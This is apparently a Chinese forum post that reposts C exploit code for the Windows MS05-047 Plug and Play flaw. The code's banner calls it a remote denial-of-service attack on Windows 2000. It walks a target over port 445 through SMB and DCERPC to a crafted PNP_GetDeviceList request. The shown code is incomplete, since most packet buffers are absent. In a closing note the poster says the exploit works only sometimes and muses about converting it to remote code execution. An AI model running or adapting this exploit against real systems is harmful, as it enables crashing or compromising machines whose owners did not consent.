ms05-047-2.c

这就是microsoft windows的ms05-047的漏洞利用代码

"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x00\x00\x00\x08\x00\x00\x01\x00\x00\x00";

char *setup_tCon(char *UNC, char *ptr)
{
int pindex = 0, uindex = 0, len; 

len = strlen(UNC);
while (uindex < len) {
if ((pindex % 2) != 0) {
ptr[pindex] = '\x00';
pindex++;
continue;
}

ptr[pindex] = UNC[uindex];
uindex++;
pindex++;
}

ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; 
ptr[pindex] ='C'; pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
}

int main(int argc, char *argv[])
{
struct sockaddr_in target;
struct hostent *host;
int sock;
char response[4096];
char UNC[50], tConXpacket[150], *temp;
char targetIP[20];
int nread, ret, templen;

if (argc < 2) {
printf("Usage: upnp_getdevicelist_DOS <host name|ip address>\n");
exit(-1);
}


printf("\n==========================================\n");
printf("WIN2K UPNP interface DOS Attack\n");
printf("Coded by Winny Thomas :-) \n");

printf("==========================================\n\n");

printf("[*] Resolving %s: ", argv[1]);
host = gethostbyname(argv[1]);
if (host == NULL) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

target.sin_family = AF_INET;
target.sin_addr = *(struct in_addr*)host->h_addr;
target.sin_port = htons(445);

sprintf(targetIP, "%s", inet_ntoa(target.sin_addr));
sock = socket(AF_INET, SOCK_STREAM, 0);
if ((ret = connect(sock, (struct sockaddr *)&target, 
sizeof(struct sockaddr))) < 0) {
perror("Connect");
exit(-1);
}

printf("[*] SMB Negotiation with %s: ", argv[1]);
if ((send(sock, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0)) < 0) {
perror("SMB Negotiate");
exit(-1);
}
ret = recv(sock, response, 4096, 0);
if ((ret < 10 || response[9] != 0)) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

printf("[*] SMB Session setup ANDX 1 with %s: ", argv[1]);
if ((send(sock, SMB_Session_setup_ANDX1, 
sizeof(SMB_Session_setup_ANDX1)-1, 0)) < 0) {
perror("SMB_Session_setup_ANDX1");
exit(-1);
}
ret = recv(sock, response, 4096, 0);
if (ret <= 10) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

printf("[*] SMB Session setup ANDX 2 with %s: ", argv[1]);
if ((send(sock, SMB_Session_setup_ANDX2, 
sizeof(SMB_Session_setup_ANDX2)-1, 0)) < 0) {
perror("SMB_Session_setup_ANDX2");
exit(-1);
}
ret = recv(sock, response, 4096, 0);
if ((ret <= 10 || response[9] != 0)) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

temp = tConXpacket;
printf("[*] SMB Tree Connect ANDX with %s: ", argv[1]);
memcpy(tConXpacket, SMB_TreeConnect_ANDX, 
sizeof(SMB_TreeConnect_ANDX)-1);
temp += sizeof(SMB_TreeConnect_ANDX) -1;
sprintf(UNC, "\\\\%s\\IPC$", targetIP);
setup_tCon(UNC, temp);
templen = (strlen(UNC)*2) +9;
tConXpacket[3] = 43 + templen;
templen -= 2;
memcpy((unsigned long *)&tConXpacket[45], &templen, 1);
if ((send(sock, tConXpacket, (sizeof(SMB_TreeConnect_ANDX) + templen), 0)) < 0) {
perror("SMB_TreeConnect_ANDX");
exit(-1);
}
ret = recv(sock, response, 4096, 0);
if ((ret <= 10 || response[9] != 0)) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

printf("[*] SMB NT Create ANDX Request to %s: ", argv[1]);
if ((send(sock, SMB_NTCreate_ANDX_Request, 
sizeof(SMB_NTCreate_ANDX_Request)-1, 0)) < 0) {
perror("SMB_NTCreate_ANDX_Request");
exit(-1);
}
ret = recv(sock, response, 4096, 0);
if (ret <= 10) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

printf("[*] DCERPC Bind to UPNP RPC Service at %s: ", argv[1]);
if ((send(sock, DCERPC_Bind_RPC_Service, 
sizeof(DCERPC_Bind_RPC_Service)-1, 0)) < 0) {
perror("DCERPC_Bind_RPC_Service");
exit(-1);
}
ret = recv(sock, response, 4096, 0);
if (ret <= 10) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");

printf("[*] PNP_GetDeviceList request to %s: ", argv[1]);
send(sock, PNP_GetDeviceList_Request, sizeof(PNP_GetDeviceList_Request)-1, 0);
recv(sock, response, 4096, 0);
printf("\033[0;32mOK\033[0;39m\n");
}[/CODE]

[COLOR=red]PS: 这个我调试了一下．通用性不好．．对win2000也不能全部成功．关键是协议．或许作者都有保留吧．有空看看能不能改成远程执行代码的．．：）[/COLOR]